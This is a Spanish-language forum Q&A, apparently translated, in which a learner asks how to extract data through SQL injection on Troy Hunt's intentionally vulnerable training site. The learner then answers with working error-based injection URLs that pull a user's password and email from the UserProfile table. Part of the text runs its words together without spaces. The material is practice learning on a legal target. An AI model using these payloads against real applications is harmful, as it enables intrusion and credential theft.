¿Cómo extraer datos de un sitio legal hackyourself con información de tablas y columnas?

Navega tus respuestas
1

Estoy siguiendo el tutorial de inyección de Pluralsight SQL. El instructor no repasó realmente la extracción de datos. 

http://hackyourselffirst.troyhunt.com/CarsByCylinders?Cylinders=V12'AND 1=(SELECT TOP 1 name from (SELECT top 1 name from sys.tables order by name) t order by name desc)--

Intentéejecutarinyeccionescomo:

http://hackyourselffirst.troyhunt.com/CarsByCylinders?Cylinders=V12'unionselectEmailFROMUserProfile--http://hackyourselffirst.troyhunt.com/CarsByCylinders?Cylinders=V12'unionselecttop1EmailFROMUserProfile--

Reciboesteerror:

TodaslasconsultascombinadasconunoperadorUNION,INTERSECTOoEXCEPTOdebentenerunnúmeroigualdeexpresionesensuslistasdeobjetivos.

Asíquepensé,oh,escorrecto,lascolumnasdebencoincidirconlaconsultaCylinders=V12.Creoqueesoseríaunoodos.Asíquecambiémiconsultaa:

http://hackyourselffirst.troyhunt.com/CarsByCylinders?Cylinders=V12'UNIONSELECTEmail,FirstNameFROMUserProfile;

Reciboesteerror:

Nosepuederesolverelconflictodeintercalaciónentre"Latin1_General_CI_AS" y "SQL_Latin1_General_CP1_CI_AS" en la operación UNION.

¿Cómo hago para extraer datos cuando tengo información de tablas y columnas?

    
pregunta Livfe 14.04.2016 - 04:20
fuente

1 respuesta

1
http://hackyourselffirst.troyhunt.com/CarsByCylinders?Cylinders=V12' AND 1=(select top 1 password from UserProfile where UserId=(select top 1 UserId from(select top 1 UserId from userprofile order by UserId) sq order by UserId DESC))--
http://hackyourselffirst.troyhunt.com/CarsByCylinders?Cylinders=V12' AND 1=(select top 1 Email from UserProfile where UserId=(select top 1 UserId from(select top 1 UserId from userprofile order by UserId) sq order by UserId DESC))--

He encontrado la solución. Ahora sé lo que realmente es la inyección de SQL basada en errores.

    
respondido por el Livfe 14.04.2016 - 05:39
fuente

Lea otras preguntas en las etiquetas

¿Los servicios web son vulnerables a CSRF? ¿Cómo puede falsificar una conexión TCP con un dispositivo que usa el mismo número de secuencia inicial para cada ejecución de un protocolo de enlace TCP?